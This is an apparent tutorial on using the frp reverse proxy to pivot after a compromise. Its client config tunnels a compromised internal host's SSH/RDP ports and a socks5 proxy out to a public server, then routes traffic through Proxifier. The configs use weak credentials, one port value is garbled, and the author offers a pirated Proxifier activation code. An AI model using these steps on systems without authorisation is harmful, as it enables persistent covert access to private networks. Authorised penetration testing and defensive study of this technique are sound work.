Table of contents
Introduction to frp
frp is a high-performance reverse proxy application that can be used for intranet penetration, and supports tcp, udp, http, https protocols. frp is divided into client-side frpc and server-side frps, the client side is used for intranet hosts, and the server side is used for public network servers.
Environment build
- frp software download https://github.com/fatedier/frp/releases
- proxifier (socks proxy software) https://www.proxifier.com/download/
- Intranet host 10.0.0.2
- Public network server 121.36.20.179
- My computer 192.168.1.2
Configuration Tutorial
Server side configuration
Because in the post-penetration test stage, we got the administrator permission, and since the intranet host 3389 only allows intranet connections, at this time we can use frp to map the 3389 port of the intranet host to the 5000 port of our public network server, and then we Use your own computer to connect to port 5000 of the public network server to remotely log in to the intranet host.
1. First, we upload frps.exe (frp server side) and frps.ini (server side configuration file) to the public network server , and then we execute the frps.exe -c frps.ini command to start the frp server side. Before starting, we need Modify the configuration file, the code is as follows:
服务器端配置
[common]
# frp监听的端口,默认是7000,可以改成其他的
bind_port = 7000
# 授权码,请改成更复杂的,这个token之后在客户端会用到
token =12345678
# frp管理后台端口,请按自己需求更改
dashboard_port = 7500
# frp管理后台用户名和密码,请改成自己的
dashboard_user = admin
dashboard_pwd = admin
enable_prometheus = true
2. You can see that the server has started successfully, and then we access port 7500, enter the account password, and you can see that the management end has successfully started.
client configuration
.First we upload frpc.exe (frp client) and frpc.ini (client configuration file) to the intranet host computer . Before starting, we need to modify the configuration file. The code is as follows:
# 客户端配置
[common]
server_addr = 服务器ip
# 与frps.ini的bind_port一致
server_port = 7000
# 与frps.ini的token一致
token = 12345678
# 配置ssh服务, 也可以用来映射其他端口如3389
[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 22
# 这个remote_port端口自定义,配置完成后会在公网服务器开启6000端口,来映射内网主机22端口
remote_port = 6000
#socks5代理配置 ,一般这个用途比较多
[socks5]
type=tcp
plugin=socks5
# socks代理账号密码,需要修改不要使用弱口令
plugin_user=admin
plugin_passwd=admin
#映射到共外网服务器的端口
remote_port = 80002. Then we configure the server ip in frpc.ini, and then run the frpc.exe -c frpc.ini command, you can see that the connection is successful
socks5 proxy configuration
1. When we use socks5 in the client configuration file, when we run the command to connect to the server, it will prompt " sock5 start proxy success "
2. Then we install the proxifier ( due to the software payment, fans who need the activation code can private message me ), after the installation is complete, open the proxifier to configure the socks proxy, first we click " Proxy Servers " in " Profile "
2. Then we choose to add, and then enter the IP address and port of the public network server, as well as the socks5 account and password in the frpc.ini file.
3. Then click "ok", then a window will pop up, then click "Yes"
4. Then we have completed the socks5 proxy configuration. Now all the traffic of our computer will be proxied through the intranet host , and we can directly access the intranet of the intranet host and configure penetration tools for intranet penetration. You can see that the proxy detection is successful.
